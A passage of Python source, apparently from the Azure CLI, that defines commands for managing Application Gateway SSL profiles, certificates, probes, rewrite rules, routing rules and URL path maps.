raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def show_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
instance = None
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
instance = cert
break
else:
raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return instance
def show_ag_backend_health(cmd, client, resource_group_name, application_gateway_name, expand=None,
protocol=None, host=None, path=None, timeout=None, host_name_from_http_settings=None,
match_body=None, match_status_codes=None, address_pool=None, http_settings=None):
from azure.cli.core.commands import LongRunningOperation
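    # if any probe-specific argument is supplied (and the API supports it), run an
    # on-demand backend health probe; otherwise return the regular backend health report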
on_demand_arguments = {protocol, host, path, timeout, host_name_from_http_settings, match_body, match_status_codes,
address_pool, http_settings}
if on_demand_arguments.difference({None}) and cmd.supported_api_version(min_api='2019-04-01'):
SubResource, ApplicationGatewayOnDemandProbe, ApplicationGatewayProbeHealthResponseMatch = cmd.get_models(
"SubResource", "ApplicationGatewayOnDemandProbe", "ApplicationGatewayProbeHealthResponseMatch")
probe_request = ApplicationGatewayOnDemandProbe(
protocol=protocol,
host=host,
path=path,
timeout=timeout,
pick_host_name_from_backend_http_settings=host_name_from_http_settings
)
if match_body is not None or match_status_codes is not None:
probe_request.match = ApplicationGatewayProbeHealthResponseMatch(
body=match_body,
status_codes=match_status_codes,
)
if address_pool is not None:
if not is_valid_resource_id(address_pool):
address_pool = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=application_gateway_name,
child_type_1='backendAddressPools',
child_name_1=address_pool
)
probe_request.backend_address_pool = SubResource(id=address_pool)
if http_settings is not None:
if not is_valid_resource_id(http_settings):
http_settings = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=application_gateway_name,
child_type_1='backendHttpSettingsCollection',
child_name_1=http_settings
)
probe_request.backend_http_settings = SubResource(id=http_settings)
return LongRunningOperation(cmd.cli_ctx)(client.begin_backend_health_on_demand(
resource_group_name, application_gateway_name, probe_request, expand))
return LongRunningOperation(cmd.cli_ctx)(client.begin_backend_health(
resource_group_name, application_gateway_name, expand))
# endregion
# region application-gateway ssl-profile
def add_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, policy_name=None,
policy_type=None, min_protocol_version=None, cipher_suites=None, disabled_ssl_protocols=None,
trusted_client_certificates=None, client_auth_configuration=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
(SubResource,
ApplicationGatewaySslPolicy,
ApplicationGatewayClientAuthConfiguration,
ApplicationGatewaySslProfile) = cmd.get_models('SubResource',
'ApplicationGatewaySslPolicy',
'ApplicationGatewayClientAuthConfiguration',
'ApplicationGatewaySslProfile')
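    # trusted client certificates are attached as SubResource references; the
    # client_auth_configuration value maps to verify_client_cert_issuer_dn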
sr_trusted_client_certificates = [SubResource(id=item) for item in
trusted_client_certificates] if trusted_client_certificates else None
ssl_policy = ApplicationGatewaySslPolicy(policy_name=policy_name, policy_type=policy_type,
min_protocol_version=min_protocol_version,
cipher_suites=cipher_suites, disabled_ssl_protocols=disabled_ssl_protocols)
client_auth = ApplicationGatewayClientAuthConfiguration(
verify_client_cert_issuer_dn=client_auth_configuration) if client_auth_configuration else None
ssl_profile = ApplicationGatewaySslProfile(trusted_client_certificates=sr_trusted_client_certificates,
ssl_policy=ssl_policy, client_auth_configuration=client_auth,
name=ssl_profile_name)
appgw.ssl_profiles.append(ssl_profile)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def update_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, policy_name=None,
policy_type=None, min_protocol_version=None, cipher_suites=None, disabled_ssl_protocols=None,
trusted_client_certificates=None, client_auth_configuration=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
instance = None
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
instance = profile
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
if policy_name is not None:
instance.ssl_policy.policy_name = policy_name
if policy_type is not None:
instance.ssl_policy.policy_type = policy_type
if min_protocol_version is not None:
instance.ssl_policy.min_protocol_version = min_protocol_version
if cipher_suites is not None:
instance.ssl_policy.cipher_suites = cipher_suites
if disabled_ssl_protocols is not None:
instance.ssl_policy.disabled_ssl_protocols = disabled_ssl_protocols
if trusted_client_certificates is not None:
SubResource = cmd.get_models('SubResource')
instance.trusted_client_certificates = [SubResource(id=item) for item in trusted_client_certificates]
if client_auth_configuration is not None:
ApplicationGatewayClientAuthConfiguration = cmd.get_models('ApplicationGatewayClientAuthConfiguration')
instance.client_auth_configuration = ApplicationGatewayClientAuthConfiguration(
verify_client_cert_issuer_dn=(client_auth_configuration == 'True')
)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def list_ssl_profile(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.ssl_profiles
def remove_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
appgw.ssl_profiles.remove(profile)
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def show_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
instance = None
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
instance = profile
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
return instance
# endregion
def add_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name,
private_link_primary=False,
private_link_ip_address=None,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
(SubResource, IPAllocationMethod,
ApplicationGatewayPrivateLinkIpConfiguration) = \
cmd.get_models('SubResource', 'IPAllocationMethod',
'ApplicationGatewayPrivateLinkIpConfiguration')
private_link_subnet_id = target_private_link.ip_configurations[0].subnet.id
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
private_link_ip_config = ApplicationGatewayPrivateLinkIpConfiguration(
name=private_link_ip_name,
private_ip_address=private_link_ip_address,
private_ip_allocation_method=private_link_ip_allocation_method,
subnet=SubResource(id=private_link_subnet_id),
primary=private_link_primary
)
target_private_link.ip_configurations.append(private_link_ip_config)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
def show_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
target_private_link_ip_config = None
for pic in target_private_link.ip_configurations:
if pic.name == private_link_ip_name:
target_private_link_ip_config = pic
break
else:
raise CLIError("IP Configuration doesn't exist")
return target_private_link_ip_config
def list_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
return target_private_link.ip_configurations
def remove_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
updated_ip_configurations = target_private_link.ip_configurations
for pic in target_private_link.ip_configurations:
if pic.name == private_link_ip_name:
updated_ip_configurations.remove(pic)
break
else:
raise CLIError("IP Configuration doesn't exist")
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
def create_ag_backend_http_settings_collection(cmd, resource_group_name, application_gateway_name, item_name, port,
probe=None, protocol='http', cookie_based_affinity=None, timeout=None,
no_wait=False, connection_draining_timeout=0,
host_name=None, host_name_from_backend_pool=None,
affinity_cookie_name=None, enable_probe=None, path=None,
auth_certs=None, root_certs=None):
ApplicationGatewayBackendHttpSettings, ApplicationGatewayConnectionDraining, SubResource = cmd.get_models(
'ApplicationGatewayBackendHttpSettings', 'ApplicationGatewayConnectionDraining', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_settings = ApplicationGatewayBackendHttpSettings(
port=port,
protocol=protocol,
cookie_based_affinity=cookie_based_affinity or 'Disabled',
request_timeout=timeout,
probe=SubResource(id=probe) if probe else None,
name=item_name)
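    # the remaining settings were introduced in later API versions, so only set what the
    # target API version supports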
if cmd.supported_api_version(min_api='2016-09-01'):
new_settings.authentication_certificates = [SubResource(id=x) for x in auth_certs or []]
if cmd.supported_api_version(min_api='2016-12-01'):
new_settings.connection_draining = \
ApplicationGatewayConnectionDraining(
enabled=bool(connection_draining_timeout), drain_timeout_in_sec=connection_draining_timeout or 1)
if cmd.supported_api_version(min_api='2017-06-01'):
new_settings.host_name = host_name
new_settings.pick_host_name_from_backend_address = host_name_from_backend_pool
new_settings.affinity_cookie_name = affinity_cookie_name
new_settings.probe_enabled = enable_probe
new_settings.path = path
if cmd.supported_api_version(min_api='2019-04-01'):
new_settings.trusted_root_certificates = [SubResource(id=x) for x in root_certs or []]
upsert_to_collection(ag, 'backend_http_settings_collection', new_settings, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_backend_http_settings_collection(cmd, instance, parent, item_name, port=None, probe=None, protocol=None,
cookie_based_affinity=None, timeout=None,
connection_draining_timeout=None,
host_name=None, host_name_from_backend_pool=None,
affinity_cookie_name=None, enable_probe=None, path=None,
auth_certs=None, root_certs=None):
SubResource = cmd.get_models('SubResource')
if auth_certs == "":
instance.authentication_certificates = None
elif auth_certs is not None:
instance.authentication_certificates = [SubResource(id=x) for x in auth_certs]
if root_certs == "":
instance.trusted_root_certificates = None
elif root_certs is not None:
instance.trusted_root_certificates = [SubResource(id=x) for x in root_certs]
if port is not None:
instance.port = port
if probe is not None:
instance.probe = SubResource(id=probe)
if protocol is not None:
instance.protocol = protocol
if cookie_based_affinity is not None:
instance.cookie_based_affinity = cookie_based_affinity
if timeout is not None:
instance.request_timeout = timeout
if connection_draining_timeout is not None:
instance.connection_draining = {
'enabled': bool(connection_draining_timeout),
'drain_timeout_in_sec': connection_draining_timeout or 1
}
if host_name is not None:
instance.host_name = host_name
if host_name_from_backend_pool is not None:
instance.pick_host_name_from_backend_address = host_name_from_backend_pool
if affinity_cookie_name is not None:
instance.affinity_cookie_name = affinity_cookie_name
if enable_probe is not None:
instance.probe_enabled = enable_probe
if path is not None:
instance.path = path
return parent
def create_ag_redirect_configuration(cmd, resource_group_name, application_gateway_name, item_name, redirect_type,
target_listener=None, target_url=None, include_path=None,
include_query_string=None, no_wait=False):
ApplicationGatewayRedirectConfiguration, SubResource = cmd.get_models(
'ApplicationGatewayRedirectConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_config = ApplicationGatewayRedirectConfiguration(
name=item_name,
redirect_type=redirect_type,
target_listener=SubResource(id=target_listener) if target_listener else None,
target_url=target_url,
include_path=include_path,
include_query_string=include_query_string)
upsert_to_collection(ag, 'redirect_configurations', new_config, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def update_ag_redirect_configuration(cmd, instance, parent, item_name, redirect_type=None,
target_listener=None, target_url=None, include_path=None,
include_query_string=None, raw=False):
SubResource = cmd.get_models('SubResource')
if redirect_type:
instance.redirect_type = redirect_type
if target_listener:
instance.target_listener = SubResource(id=target_listener)
instance.target_url = None
if target_url:
instance.target_listener = None
instance.target_url = target_url
if include_path is not None:
instance.include_path = include_path
if include_query_string is not None:
instance.include_query_string = include_query_string
return parent
def create_ag_rewrite_rule_set(cmd, resource_group_name, application_gateway_name, item_name, no_wait=False):
ApplicationGatewayRewriteRuleSet = cmd.get_models(
'ApplicationGatewayRewriteRuleSet')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_set = ApplicationGatewayRewriteRuleSet(name=item_name)
upsert_to_collection(ag, 'rewrite_rule_sets', new_set, 'name')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
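    # without --no-wait, block until the gateway update finishes and return the new rule set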
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, item_name,
path='rewrite_rule_sets', key_path='name')
def update_ag_rewrite_rule_set(instance, parent, item_name):
return parent
def create_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name,
sequence=None, request_headers=None, response_headers=None, no_wait=False,
modified_path=None, modified_query_string=None, enable_reroute=None):
(ApplicationGatewayRewriteRule,
ApplicationGatewayRewriteRuleActionSet,
ApplicationGatewayUrlConfiguration) = cmd.get_models('ApplicationGatewayRewriteRule',
'ApplicationGatewayRewriteRuleActionSet',
'ApplicationGatewayUrlConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
rule_set = find_child_item(ag, rule_set_name,
path='rewrite_rule_sets', key_path='name')
url_configuration = None
if any([modified_path, modified_query_string, enable_reroute]):
url_configuration = ApplicationGatewayUrlConfiguration(modified_path=modified_path,
modified_query_string=modified_query_string,
reroute=enable_reroute)
new_rule = ApplicationGatewayRewriteRule(
name=rule_name,
rule_sequence=sequence,
action_set=ApplicationGatewayRewriteRuleActionSet(
request_header_configurations=request_headers,
response_header_configurations=response_headers,
url_configuration=url_configuration
)
)
upsert_to_collection(rule_set, 'rewrite_rules', new_rule, 'name')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
def update_ag_rewrite_rule(instance, parent, cmd, rule_set_name, rule_name, sequence=None,
request_headers=None, response_headers=None,
modified_path=None, modified_query_string=None, enable_reroute=None):
with cmd.update_context(instance) as c:
c.set_param('rule_sequence', sequence)
c.set_param('action_set.request_header_configurations', request_headers)
c.set_param('action_set.response_header_configurations', response_headers)
ApplicationGatewayUrlConfiguration = cmd.get_models('ApplicationGatewayUrlConfiguration')
url_configuration = None
if any([modified_path, modified_query_string, enable_reroute]):
url_configuration = ApplicationGatewayUrlConfiguration(modified_path=modified_path,
modified_query_string=modified_query_string,
reroute=enable_reroute)
c.set_param('action_set.url_configuration', url_configuration)
return parent
def show_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_item(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
def list_ag_rewrite_rules(cmd, resource_group_name, application_gateway_name, rule_set_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_collection(gateway, rule_set_name, path='rewrite_rule_sets.rewrite_rules', key_path='name')
def delete_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name, no_wait=None):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
rule_set = find_child_item(gateway, rule_set_name, path='rewrite_rule_sets', key_path='name')
rule = find_child_item(rule_set, rule_name, path='rewrite_rules', key_path='name')
rule_set.rewrite_rules.remove(rule)
sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, application_gateway_name, gateway)
def create_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name,
variable, no_wait=False, pattern=None, ignore_case=None, negate=None):
ApplicationGatewayRewriteRuleCondition = cmd.get_models(
'ApplicationGatewayRewriteRuleCondition')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
rule = find_child_item(ag, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
new_condition = ApplicationGatewayRewriteRuleCondition(
variable=variable,
pattern=pattern,
ignore_case=ignore_case,
negate=negate
)
upsert_to_collection(rule, 'conditions', new_condition, 'variable')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, rule_set_name, rule_name, variable,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name.variable')
def update_ag_rewrite_rule_condition(instance, parent, cmd, rule_set_name, rule_name, variable, pattern=None,
ignore_case=None, negate=None):
with cmd.update_context(instance) as c:
c.set_param('pattern', pattern)
c.set_param('ignore_case', ignore_case)
c.set_param('negate', negate)
return parent
def show_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name,
rule_name, variable):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_item(gateway, rule_set_name, rule_name, variable,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name.variable')
def list_ag_rewrite_rule_conditions(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_collection(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name')
def delete_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name,
rule_name, variable, no_wait=None):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
rule = find_child_item(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
condition = find_child_item(rule, variable, path='conditions', key_path='variable')
rule.conditions.remove(condition)
sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, application_gateway_name, gateway)
def create_ag_probe(cmd, resource_group_name, application_gateway_name, item_name, protocol, host,
path, interval=30, timeout=120, threshold=8, no_wait=False, host_name_from_http_settings=None,
min_servers=None, match_body=None, match_status_codes=None, port=None):
ApplicationGatewayProbe, ProbeMatchCriteria = cmd.get_models(
'ApplicationGatewayProbe', 'ApplicationGatewayProbeHealthResponseMatch')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_probe = ApplicationGatewayProbe(
name=item_name,
protocol=protocol,
host=host,
path=path,
interval=interval,
timeout=timeout,
unhealthy_threshold=threshold)
if cmd.supported_api_version(min_api='2017-06-01'):
new_probe.pick_host_name_from_backend_http_settings = host_name_from_http_settings
new_probe.min_servers = min_servers
new_probe.match = ProbeMatchCriteria(body=match_body, status_codes=match_status_codes)
if cmd.supported_api_version(min_api='2019-04-01'):
new_probe.port = port
upsert_to_collection(ag, 'probes', new_probe, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_probe(cmd, instance, parent, item_name, protocol=None, host=None, path=None,
interval=None, timeout=None, threshold=None, host_name_from_http_settings=None,
min_servers=None, match_body=None, match_status_codes=None, port=None):
if protocol is not None:
instance.protocol = protocol
if host is not None:
instance.host = host
if path is not None:
instance.path = path
if interval is not None:
instance.interval = interval
if timeout is not None:
instance.timeout = timeout
if threshold is not None:
instance.unhealthy_threshold = threshold
if host_name_from_http_settings is not None:
instance.pick_host_name_from_backend_http_settings = host_name_from_http_settings
if min_servers is not None:
instance.min_servers = min_servers
if match_body is not None or match_status_codes is not None:
ProbeMatchCriteria = \
cmd.get_models('ApplicationGatewayProbeHealthResponseMatch')
instance.match = instance.match or ProbeMatchCriteria()
if match_body is not None:
instance.match.body = match_body
if match_status_codes is not None:
instance.match.status_codes = match_status_codes
if port is not None:
instance.port = port
return parent
def create_ag_request_routing_rule(cmd, resource_group_name, application_gateway_name, item_name,
address_pool=None, http_settings=None, http_listener=None, redirect_config=None,
url_path_map=None, rule_type='Basic', no_wait=False, rewrite_rule_set=None,
priority=None):
ApplicationGatewayRequestRoutingRule, SubResource = cmd.get_models(
'ApplicationGatewayRequestRoutingRule', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if not address_pool and not redirect_config:
address_pool = _get_default_id(ag, 'backend_address_pools', '--address-pool')
if not http_settings and not redirect_config:
http_settings = _get_default_id(ag, 'backend_http_settings_collection', '--http-settings')
if not http_listener:
http_listener = _get_default_id(ag, 'http_listeners', '--http-listener')
new_rule = ApplicationGatewayRequestRoutingRule(
name=item_name,
rule_type=rule_type,
priority=priority,
backend_address_pool=SubResource(id=address_pool) if address_pool else None,
backend_http_settings=SubResource(id=http_settings) if http_settings else None,
http_listener=SubResource(id=http_listener),
url_path_map=SubResource(id=url_path_map) if url_path_map else None)
if cmd.supported_api_version(min_api='2017-06-01'):
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else None
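    # look up the local variable name for rewrite_rule_set so supported_api_version can
    # resolve the minimum API version registered for that parameter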
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
upsert_to_collection(ag, 'request_routing_rules', new_rule, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_request_routing_rule(cmd, instance, parent, item_name, address_pool=None,
http_settings=None, http_listener=None, redirect_config=None, url_path_map=None,
rule_type=None, rewrite_rule_set=None, priority=None):
SubResource = cmd.get_models('SubResource')
if address_pool is not None:
instance.backend_address_pool = SubResource(id=address_pool)
if http_settings is not None:
instance.backend_http_settings = SubResource(id=http_settings)
if redirect_config is not None:
instance.redirect_configuration = SubResource(id=redirect_config)
if http_listener is not None:
instance.http_listener = SubResource(id=http_listener)
if url_path_map is not None:
instance.url_path_map = SubResource(id=url_path_map)
if rule_type is not None:
instance.rule_type = rule_type
if rewrite_rule_set is not None:
instance.rewrite_rule_set = SubResource(id=rewrite_rule_set)
with cmd.update_context(instance) as c:
c.set_param('priority', priority)
return parent
def create_ag_ssl_certificate(cmd, resource_group_name, application_gateway_name, item_name, cert_data=None,
cert_password=None, key_vault_secret_id=None, no_wait=False):
ApplicationGatewaySslCertificate = cmd.get_models('ApplicationGatewaySslCertificate')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_cert = ApplicationGatewaySslCertificate(
name=item_name, data=cert_data, password=cert_password, key_vault_secret_id=key_vault_secret_id)
upsert_to_collection(ag, 'ssl_certificates', new_cert, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_ssl_certificate(instance, parent, item_name,
cert_data=None, cert_password=None, key_vault_secret_id=None):
if cert_data is not None:
instance.data = cert_data
if cert_password is not None:
instance.password = cert_password
if key_vault_secret_id is not None:
instance.key_vault_secret_id = key_vault_secret_id
return parent
def set_ag_ssl_policy_2017_03_01(cmd, resource_group_name, application_gateway_name, disabled_ssl_protocols=None,
clear=False, no_wait=False):
ApplicationGatewaySslPolicy = cmd.get_models('ApplicationGatewaySslPolicy')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.ssl_policy = None if clear else ApplicationGatewaySslPolicy(
disabled_ssl_protocols=disabled_ssl_protocols)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def set_ag_ssl_policy_2017_06_01(cmd, resource_group_name, application_gateway_name, policy_name=None, policy_type=None,
disabled_ssl_protocols=None, cipher_suites=None, min_protocol_version=None,
no_wait=False):
ApplicationGatewaySslPolicy, ApplicationGatewaySslPolicyType = cmd.get_models(
'ApplicationGatewaySslPolicy', 'ApplicationGatewaySslPolicyType')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
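    # the effective policy type is recomputed from the other arguments: a predefined policy
    # name implies Predefined; custom cipher suites or a minimum protocol version imply Custom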
policy_type = None
if policy_name:
policy_type = ApplicationGatewaySslPolicyType.predefined.value
elif cipher_suites or min_protocol_version:
policy_type = ApplicationGatewaySslPolicyType.custom.value
ag.ssl_policy = ApplicationGatewaySslPolicy(
policy_name=policy_name,
policy_type=policy_type,
disabled_ssl_protocols=disabled_ssl_protocols,
cipher_suites=cipher_suites,
min_protocol_version=min_protocol_version)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_ssl_policy(cmd, resource_group_name, application_gateway_name):
return network_client_factory(cmd.cli_ctx).application_gateways.get(
resource_group_name, application_gateway_name).ssl_policy
def create_ag_trusted_root_certificate(cmd, resource_group_name, application_gateway_name, item_name, no_wait=False,
cert_data=None, keyvault_secret=None):
ApplicationGatewayTrustedRootCertificate = cmd.get_models('ApplicationGatewayTrustedRootCertificate')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
root_cert = ApplicationGatewayTrustedRootCertificate(name=item_name, data=cert_data,
key_vault_secret_id=keyvault_secret)
upsert_to_collection(ag, 'trusted_root_certificates', root_cert, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_trusted_root_certificate(instance, parent, item_name, cert_data=None, keyvault_secret=None):
if cert_data is not None:
instance.data = cert_data
if keyvault_secret is not None:
instance.key_vault_secret_id = keyvault_secret
return parent
def create_ag_url_path_map(cmd, resource_group_name, application_gateway_name, item_name, paths,
address_pool=None, http_settings=None, redirect_config=None, rewrite_rule_set=None,
default_address_pool=None, default_http_settings=None, default_redirect_config=None,
no_wait=False, rule_name='default', default_rewrite_rule_set=None, firewall_policy=None):
ApplicationGatewayUrlPathMap, ApplicationGatewayPathRule, SubResource = cmd.get_models(
'ApplicationGatewayUrlPathMap', 'ApplicationGatewayPathRule', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_rule = ApplicationGatewayPathRule(
name=rule_name,
backend_address_pool=SubResource(id=address_pool) if address_pool else None,
backend_http_settings=SubResource(id=http_settings) if http_settings else None,
paths=paths
)
new_map = ApplicationGatewayUrlPathMap(
name=item_name,
default_backend_address_pool=SubResource(id=default_address_pool) if default_address_pool else None,
default_backend_http_settings=SubResource(id=default_http_settings) if default_http_settings else None,
path_rules=[])
if cmd.supported_api_version(min_api='2017-06-01'):
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else None
new_map.default_redirect_configuration = \
SubResource(id=default_redirect_config) if default_redirect_config else None
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
new_map.default_rewrite_rule_set = \
SubResource(id=default_rewrite_rule_set) if default_rewrite_rule_set else None
if cmd.supported_api_version(min_api='2019-09-01'):
new_rule.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
# pull defaults from the rule specific properties if the default-* option isn't specified
if new_rule.backend_address_pool and not new_map.default_backend_address_pool:
new_map.default_backend_address_pool = new_rule.backend_address_pool
if new_rule.backend_http_settings and not new_map.default_backend_http_settings:
new_map.default_backend_http_settings = new_rule.backend_http_settings
if new_rule.redirect_configuration and not new_map.default_redirect_configuration:
new_map.default_redirect_configuration = new_rule.redirect_configuration
new_map.path_rules.append(new_rule)
upsert_to_collection(ag, 'url_path_maps', new_map, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
